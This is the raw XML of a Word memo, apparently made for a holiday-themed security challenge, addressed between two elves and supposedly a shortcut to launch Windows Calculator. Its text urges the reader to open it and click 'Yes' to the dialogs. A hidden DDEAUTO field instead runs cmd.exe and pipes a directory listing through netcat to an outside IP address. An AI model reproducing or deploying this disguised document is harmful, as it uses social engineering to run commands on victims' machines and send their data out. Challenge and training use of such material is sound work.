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67766" w:rsidRDefault="00FA792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4572000" cy="1914525"/>
                <wp:effectExtent l="0" t="0" r="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Pr="001729CA" w:rsidRDefault="001729CA" w:rsidP="001729CA">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:jc w:val="center"/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</w:pP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669900"/>
                                <w:sz w:val="280"/>
                                <w:szCs w:val="280"/>
                              </w:rPr>
                              <w:t>M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  <w:t>E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669900"/>
                                <w:sz w:val="280"/>
                                <w:szCs w:val="280"/>
                              </w:rPr>
                              <w:t>M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in;margin-top:9pt;width:5in;height:1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d/tQIAALs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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00F67766" w:rsidRPr="001729CA" w:rsidRDefault="001729CA" w:rsidP="001729CA">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:jc w:val="center"/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</w:pPr>
                      <w:r w:rsidRPr="001729CA">
                        <w:rPr>
                          <w:rFonts w:ascii="Hank BT" w:hAnsi="Hank BT"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="669900"/>
                          <w:sz w:val="280"/>
                          <w:szCs w:val="280"/>
                        </w:rPr>
                        <w:t>M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  <w:t>E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669900"/>
                          <w:sz w:val="280"/>
                          <w:szCs w:val="280"/>
                        </w:rPr>
                        <w:t>M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2532380" cy="2820670"/>
                <wp:effectExtent l="0" t="0" r="1270" b="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282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Default="00FA79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2675" cy="2733675"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="1" name="Picture 1" descr="xmas_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xmas_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63pt;margin-top:-45pt;width:199.4pt;height:2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6xuwIAAMI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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00F67766" w:rsidRDefault="00FA792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2675" cy="2733675"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="1" name="Picture 1" descr="xmas_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xmas_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273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-914400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7886700" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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28600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="89A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F33F3" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:-99pt;margin-top:-1in;width:62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" fillcolor="#89aa00" stroked="f"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p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F67766" w:rsidRDefault="00FA792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-3543300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="1371600"/>
                <wp:effectExtent l="9525" t="9525" r="9525" b="952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CF63E" id="Line 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9pt,8.15pt" to="-279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" strokecolor="white" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/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F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="003A446E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</w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve">  </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/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3A446E" w:rsidRDefault="003A446E"/>
    <w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/>
    <w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/>
    <w:p w:rsidR="003A446E" w:rsidRDefault="003A446E"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="003A446E">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A446E">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k dir | nc.exe 10.142.0.11 44665"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FA79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166370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7086600" cy="16383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TO: Wunorse Openslae</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001729CA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FROM: Shinny Upatree</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="001729CA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Reminder for Calculator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63pt;margin-top:13.1pt;width:558pt;height:1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00F67766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TO: Wunorse Openslae</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001729CA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FROM: Shinny Upatree</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001729CA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Subject: Reminder for Calculator Access</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00F67766"/>
    <w:p w:rsidR="00F67766" w:rsidRDefault="00FA7928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  <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS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466725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6781800" cy="36861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I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.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Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.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Please try not to delete this document as well.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Sincerely,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3E5FA0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>
                              <w:rPr>
                                <w:color w:val="89AA00"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Shinny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63pt;margin-top:36.75pt;width:534pt;height:29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whugIAAME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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00F67766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I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.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Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.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Please try not to delete this document as well.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Sincerely,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bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:bookmarkEnd w:id="1"/>
                    </w:p>
                    <w:p w:rsidR="001729CA" w:rsidRPr="001729CA" w:rsidRDefault="003E5FA0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>
                        <w:rPr>
                          <w:color w:val="89AA00"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Shinny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4C" w:rsidRDefault="0083494C" w:rsidP="001729CA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0083494C" w:rsidRDefault="0083494C" w:rsidP="0017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nk BT">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="00"/>
    <w:family w:val="script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4C" w:rsidRDefault="0083494C" w:rsidP="001729CA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0083494C" w:rsidRDefault="0083494C" w:rsidP="0017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7927"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E520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1DC0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2FCA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noPunctuationKerning/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="11265">
      <o:colormru v:ext="edit" colors="#069,#369,#099,#09c,#930,#89a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A"/>
    <w:rsid w:val="001729CA"/>
    <w:rsid w:val="002C6B4B"/>
    <w:rsid w:val="003A446E"/>
    <w:rsid w:val="003E5FA0"/>
    <w:rsid w:val="00680303"/>
    <w:rsid w:val="007F5ABE"/>
    <w:rsid w:val="0083494C"/>
    <w:rsid w:val="00880834"/>
    <w:rsid w:val="009F1668"/>
    <w:rsid w:val="00F67766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#069,#369,#099,#09c,#930,#89aa00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FFFFFF"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color w:val="FFFFFF"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color w:val="33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rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:color w:val="003366"/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:line="280" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="003366"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rPr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29CA"/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet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29CA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86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2017-11-27T19:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-27T19:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>